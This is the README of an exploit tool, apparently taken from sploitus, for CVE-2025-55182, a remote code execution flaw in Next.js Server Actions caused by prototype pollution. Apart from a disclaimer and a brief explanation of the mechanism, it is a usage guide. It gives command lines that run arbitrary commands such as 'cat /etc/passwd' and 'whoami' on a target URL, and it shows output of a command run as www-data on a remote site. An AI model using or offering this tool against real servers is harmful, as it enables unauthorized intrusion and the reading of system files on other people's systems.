Share
## https://sploitus.com/exploit?id=CF0E13FC-1960-5EF7-B01D-5543FF8C320E
# CVE-2025-55182 Next.js RCE Exploit Tool

[δΈ­ζ–‡ζ–‡ζ‘£](./README.zh-CN.md) | [ζΌζ΄žεŽŸη†εˆ†ζž](./EXPLOIT.md)

---

> [!CAUTION]
> ## ⚠️ DISCLAIMER - READ BEFORE USE
>
> **This tool is intended ONLY for:**
> - Security researchers conducting vulnerability verification
> - Authorized penetration testing with explicit permission
> - Educational and learning purposes
>
> **Unauthorized access to computer systems is ILLEGAL.**
>
> By using this tool, you agree that:
> 1. You have obtained proper authorization before testing any system
> 2. You will not use this tool for malicious purposes
> 3. You are solely responsible for your actions and any consequences
>
> **The author assumes NO liability for misuse of this tool.**

---

A remote code execution (RCE) exploit tool for Next.js server-side prototype pollution vulnerability.

## Vulnerability Overview

CVE-2025-55182 is a critical security vulnerability affecting Next.js that allows attackers to achieve remote code execution through crafted requests exploiting prototype pollution.

> πŸ“– For detailed technical analysis, see [EXPLOIT.md](./EXPLOIT.md)

### Affected Versions

- Specific versions of Next.js (refer to official security advisory)

### How It Works

This vulnerability exploits the Next.js Server Actions request handling mechanism, achieving arbitrary code execution through `__proto__` prototype chain pollution combined with the `Function` constructor.

## Installation

```bash
# Using yarn
yarn install

# Using npm
npm install
```

## Usage

### Direct Execution

```bash
# Basic usage
node index.js  [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
```

### Using yarn scripts

```bash
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help
```

### Global CLI Installation

```bash
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink
```

## CLI Options

```
Usage:
  cve-2025-55182  [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number
```

## Output Format

The tool outputs results in JSON format:

### Successful Execution

```json
{
  "success": true,
  "message": "",
  "data": "command execution result"
}
```

### Failed Execution

```json
{
  "success": false,
  "message": "error message",
  "data": null
}
```

## Example

```bash
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}
```

## Dependencies

- [axios](https://github.com/axios/axios) - HTTP client
- [form-data](https://github.com/form-data/form-data) - FormData builder

## References

- [Refer to Python scripts](https://github.com/msanft/CVE-2025-55182)